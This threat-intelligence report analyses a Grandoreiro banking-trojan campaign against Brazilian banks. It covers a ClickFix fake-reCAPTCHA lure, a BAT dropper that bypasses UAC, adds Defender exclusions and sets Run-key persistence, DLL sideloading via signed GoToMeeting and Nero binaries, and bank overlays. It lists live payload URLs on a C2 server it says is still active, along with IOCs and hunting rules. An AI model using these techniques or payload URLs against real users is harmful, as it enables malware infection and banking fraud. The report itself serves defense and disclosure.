Grandoreiro's ClickFix Era: A Fake reCAPTCHA, a GoToMeeting DLL Sideload, and PIX QR Interception Against Eight Brazilian Banks

TL;DR

On April 8, 2026, a 951-byte batch file (p.bat) surfaced on MalwareBazaar (reported by johnk3r). Following the download URLs leads to a Grandoreiro-family Brazilian banking trojan delivered through a ClickFix/ClearFake fake-reCAPTCHA chain hosted at canalmodup.com. The payload is a 43.7 MB Delphi DLL that sideloads under legitimate, signed GoToMeeting (LogMeIn) and Nero WiFi+Transfer (Nero AG) binaries, targets eight major Brazilian banks, and ships with PIX QR-code interception.

The C2 at 177.136.230.88 (EVEO S.A., AS53107, Brazil) is live and actively serving payloads as of publication. The canalmodup.com domain was registered on 2025-12-19 through an Italian registrar with a Portuguese registrant, and has been pre-staged for nearly four months before this wave went active.

What this report adds to the public record:

• Documents the live ClickFix chain at canalmodup.com (fake reCAPTCHA → ClickFix instructions → fake Warsaw module update page) pushing the Grandoreiro variant
• Details both DLL sideloading pairs used by this campaign: g2mstart.exe + g2m.dll (GoToMeeting / LogMeIn) and Flexpcis.exe + Drivespan.dll (Nero WiFi+Transfer)
• Captures the full banking overlay target set — Banco do Brasil, Bradesco, Caixa Econômica Federal, Itaú Unibanco, Santander, Sicoob, Sicredi, and Unicred — impersonating GAS Tecnologia, Topaz OFD, and Trusteer IBM security modules
• Provides the live payload URLs and IOCs so defenders and CERT.br can coordinate a takedown while the C2 is still serving

Hat tip to johnk3r for the sample on MalwareBazaar. If you've already published reporting on canalmodup.com, the EVEO C2, or this particular Grandoreiro variant, please reach out — we'll update and credit.

---

The Sample

Field	Value
Filename	p.bat (alt: 708347eab01ecdb9.bat)
SHA256	9ffdbc990c92e9564bbf8dd727c2540f60aa18868c463e81e361069ad5e53938
MD5	c87db14b102d98e6e225cfab157c8868
File Type	DOS batch file, 951 bytes
VT Detection	9/75 (Microsoft: Trojan:Script/Wacatac.B!ml)
First seen on MalwareBazaar	2026-04-08 01:32 UTC
Reporter	johnk3r

Stage 0 — The ClickFix Chain at canalmodup.com

The campaign wraps this sample in a three-page social engineering chain:

Page 1 — canalmodup.com/ A fake Google reCAPTCHA ("Não sou um robô") calls navigator.clipboard.writeText() on click, silently copying a PowerShell command into the victim's clipboard. After 2.5 seconds the page redirects.

Page 2 — /b1dcae2d1df7766a915a43b9fd9f00f8d791e04c.php Titled "Confirmação necessária", this is the ClickFix instruction page:

1. Press Win+R
2. Type cmd and press Shift+Ctrl+Enter
3. Press Ctrl+V
4. Press Enter

The victim pastes the malicious PowerShell command from their clipboard into an elevated command prompt and runs it themselves — bypassing most execution-policy and mark-of-the-web defenses in the process.

Page 3 — /a648da8021b90563fe11358516f936ebccf8100c.php Titled "Módulo Warsaw" and impersonating Caixa Econômica Federal's security module, this page tells the victim "Erro ao atualizar o Modulo" ("Error updating the module") and instructs them to visit internetbanking.caixa.gov.br or gerenciador.caixa.gov.br to "update the module". This is the point where the overlay-ready trojan is already installed and the victim is being steered into a real banking session for capture. The HTML contains commented-out code for a planned browser extension installation flow — the actor's roadmap leaking in page source.

Stage 1 — The BAT Dropper

The 951-byte p.bat does a lot in a tiny footprint:

1. UAC bypass — uses cacls.exe against %SYSTEMROOT%\system32\config\system to check for admin rights, then drops getadmin.vbs using Shell.Application.ShellExecute(..., "runas") to re-launch elevated if not.
2. PowerShell exec — launches with -nop -noni -w h -ep bypass.
3. Payload download — Net.WebClient.DownloadFile pulls two files into C:\ProgramData\MSDefender\:
   • http://177.136.230.88/modulo/g2mstart.exe
   • http://177.136.230.88/modulo/g2m.dll
4. Defender exclusions — Add-MpPreference excludes the MSDefender directory, the g2mstart.exe process, and extensions exe, msi, dll.
5. Registry persistence — writes HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\g2mstart.
6. Execution — Start-Process launches g2mstart.exe.

Stage 2 — DLL Sideloading via GoToMeeting and Nero

Chain A: GoToMeeting

g2mstart.exe is a legitimate GoToMeeting v10.18.0 Build 19932 by LogMeIn, Inc., signed by LogMeIn via DigiCert. The cert expired in November 2021 but the binary remains valid as a sideload host. Its PDB path is the giveaway for the clean original:

c:\jenkins\workspace\Communication_Cloud\G2MWTEndpoint\Production\build-g2mwt-endpoint\output\G2M_Exe.pdb

VT: 0/76 detections — the binary itself is clean and being abused.

g2m.dll (45,796,352 bytes — 43.7 MB) is the malicious sidecar. It's a Delphi-compiled DLL (Embarcadero RAD Studio, ProgramID com.embarcadero.G2M, compile timestamp 2026-03-29) that exports the g2mcomm_winmain entry point g2mstart.exe imports. Its .rsrc section is 42.4 MB — 92.7% of the file is embedded banking overlay imagery. Imports include Magnification.dll (Windows Magnification API for screen capture), wsock32, and libcurl (curl_easy_* — an embedded HTTP client).

Chain B: Nero WiFi+Transfer

Flexpcis.exe is a legitimate Nero WiFi+Transfer v1.0.3.78, signed by Nero AG via Symantec/VeriSign. VT: 0/75 detections. Community reporting has seen this same signed binary distributed under at least 24 different filenames in sideloading campaigns: BackItUp.exe, mssedge.exe, Nabisko.exe, RedeWiFi.exe, V2motortubo.exe, and others.

Drivespan.dll (42,052,096 bytes — 40.1 MB) is the malicious companion. A prior version (041cbfa91ad48fa34f3437e440399838e82451b8d183c3cc52d7d8cb5037c494) hit 46/76 on VT.

Stage 3 — Delphi Banking Trojan Internals

The Delphi class names inside the DLL read like a Brazilian banker inventory:

Class	Capability
TFrmPrincipal	Main controller form
TClientePrincipal	Primary C2 client
TClienteCmd	Remote command execution
TClienteViewer	Remote screen viewer
TTNT_01 … TTNT_07	Bank overlay attack forms (stay-on-top, borderless, timed)
TClipboard	Clipboard manipulation (PIX key / QR interception)
Magnification.dll imports	Screen capture via Windows Magnification API
TIdHTTP, TCPClient	Indy HTTP + raw socket C2

The resource section contains 38 bitmap overlays (L01–L38) and 29 PNG overlay screens across the target bank set:

Resource prefix	Target bank	Overlay count	Purpose
TNTB	Banco do Brasil	4 + QR	BB Code validation, Topaz OFD impersonation
TNTC	Caixa Econômica Federal	1	Electronic signature capture
TNTCOOB	Sicoob	1	Confirmation code interception
TNTD	Bradesco	5 + PISCA	Security key validation, GAS Tecnologia impersonation
TNTI	Itaú Unibanco	4	"Guardião 30 Horas" install, card password theft
TNTS	Santander	4 + QR	Electronic signature, QR validation, Trusteer impersonation
TNTSIC	Sicredi	2	Electronic password + device serial capture
PNGIMAGE_1	Unicred	1	Security plugin update
PNGIMAGE_5	Banco do Brasil	1	Diagnostic / install screen
RC02–RC38	Various	26	Additional overlay variants

All overlays are branded with legitimate Brazilian banking security product logos (GAS Tecnologia, Topaz OFD Anti-Fraud Intelligence, Trusteer IBM) and capture card passwords, electronic signatures, QR/BB-code validation codes, device serial numbers, and PIX confirmation codes.

The C2 — 177.136.230.88 on EVEO S.A.

Field	Value
IP	177.136.230.88
ASN	AS53107 — EVEO S.A.
Network	177.136.224.0/19
Country	Brazil
Open ports	22 (OpenSSH 9.6p1 Ubuntu), 80, 443 (Apache)
DNS	dns-a.eveo.com.br, dns-b.eveo.com.br, dns-c.eveo.com.br

The HTTP root returns 403 Forbidden. The payload path /modulo/ also returns 403, but individual files inside it are directly accessible — a misconfiguration rather than intentional. .git/ and .env are also present as 403-restricted endpoints. As of publication the payloads are still live.

canalmodup.com

Field	Value
Registrar	Register SPA (Italy)
Created	2025-12-19
Expires	2026-12-19
Registrant country	Portugal
Registrant region	Aboboda (suburb of Lisbon)
Nameservers	Cloudflare (laylah.ns.cloudflare.com, rohin.ns.cloudflare.com)
TLS	Let's Encrypt R12 (2026-03-26), wildcard issued 2026-02-17
Cloudflare Analytics beacon	51dbae0a01854a769d9b1267c91acdd8

The Cloudflare Analytics beacon 51dbae0a01854a769d9b1267c91acdd8 is reused across all pages in the ClickFix chain and makes a clean pivot point for hunting related infrastructure.

Multi-Vector Distribution

The BAT file is just one leg of a larger campaign. Nine related samples were observed speaking to the same C2, spanning at least five distinct delivery mechanisms:

1. BAT dropper (p.bat, this sample)
2. ClickFix / ClearFake fake-CAPTCHA clipboard injection (pushes Flexpcis.exe + Drivespan.dll)
3. VBS droppers disguised as DANFE (Brazilian electronic invoice)
4. MSI installers — screanb.msi, screen rec.msi, Aplication.msi
5. Direct executables — karm.exe, Aplicativo.exe

Campaign Timeline

Date	Event
2025-12-19	canalmodup.com registered
2026-02-17	Wildcard TLS cert issued
2026-03-26	Production TLS cert issued
2026-03-29	g2m.dll compiled (PE timestamp)
2026-03-29	FlexpcisInstaller.exe first seen on VT
2026-03-30	Drivespan.dll modified
2026-04-01	g2mstart.exe + g2m.dll last modified on C2
2026-04-06	MSI droppers first seen on VT
2026-04-07	modulo.zip updated on C2
2026-04-08	p.bat submitted to MalwareBazaar

Family Attribution — Grandoreiro, High Confidence

Every characteristic in the profile maps cleanly onto the Grandoreiro family:

• Delphi (Embarcadero RAD Studio) compilation — hallmark of Brazilian LATAM bankers
• DLL sideloading via legitimate signed binaries — standard Grandoreiro TTP, and use of GoToMeeting specifically has been documented in Grandoreiro campaigns since 2023
• Overlay attack forms with TTNT_* naming — consistent with prior Grandoreiro analysis
• Portuguese-named Delphi classes (TClientePrincipal, TClienteCmd, TClienteViewer)
• GAS Tecnologia / Topaz OFD / Trusteer impersonation — common in Grandoreiro variants
• PIX QR interception — modernization Grandoreiro operators added in 2024+
• Brazilian bank exclusivity with high-fidelity overlays
• ClickFix delivery — evolution from the family's traditional email and SEO poisoning

Detections & Hunting

• Block 177.136.230.88 and canalmodup.com at the perimeter.
• Alert on any process writing into C:\ProgramData\MSDefender\.
• Alert on Add-MpPreference -ExclusionPath "C:\ProgramData\MSDefender" or similar Defender exclusion strings referencing MSDefender paths.
• Hunt for g2mstart.exe loading g2m.dll from any path other than its legitimate LogMeIn install directory.
• Hunt for Flexpcis.exe running under any name other than its Nero WiFi+Transfer install directory; pivot on the 24+ known aliases (BackItUp.exe, mssedge.exe, RedeWiFi.exe, V2motortubo.exe, …).
• Pivot on Cloudflare Analytics beacon 51dbae0a01854a769d9b1267c91acdd8 to discover sibling ClickFix pages.
• Clipboard hunting: look for navigator.clipboard.writeText usage in unfamiliar landing pages followed by a user running PowerShell from Win+R / cmd.exe.

IOCs

Network

177.136.230.88                                 C2 (EVEO S.A., AS53107, Brazil)
canalmodup.com                                  ClickFix landing domain
http://177.136.230.88/modulo/g2mstart.exe       Legitimate GoToMeeting binary (sideload host)
http://177.136.230.88/modulo/g2m.dll            Malicious Delphi DLL
http://177.136.230.88/modulo/Flexpcis.exe       Legitimate Nero binary (sideload host)
http://177.136.230.88/modulo/Drivespan.dll      Malicious DLL (Nero chain)
http://177.136.230.88/modulo/modulo.zip         Module bundle
51dbae0a01854a769d9b1267c91acdd8                Cloudflare Analytics beacon (pivot)

File Hashes (SHA256)

9ffdbc990c92e9564bbf8dd727c2540f60aa18868c463e81e361069ad5e53938  p.bat
f5d6037d2149e755813b9dbfc141f67054342f490534b730ed1494232ba3ac7d  g2m.dll (malicious)
917c44b884fd59b5bcf2a8e9a5fd39dbceb544f60eb8fa9316729e9572a7865d  Drivespan.dll (malicious)
07762231da2a8ce1dd2a211c49a27a2f06d7d2b7d5426fc5b6b114f845f1eca6  g2mstart.exe (legitimate, abused)
7e4132835419e4c415d048b64a5fc2813b8d2ff72bb5586d857dcdf6a90a45f2  Flexpcis.exe (legitimate, abused)

Host

C:\ProgramData\MSDefender\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\g2mstart
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Flexpcis

Disclosure

The C2 at 177.136.230.88 is serving live banking trojan payloads against eight Brazilian financial institutions as of this report. Relevant notification targets:

• CERT.br — cert@cert.br
• EVEO S.A. abuse — via published WHOIS contacts
• Banco Central do Brasil — financial sector regulator

---

GHOST — Breakglass Intelligence "One indicator. Total infrastructure."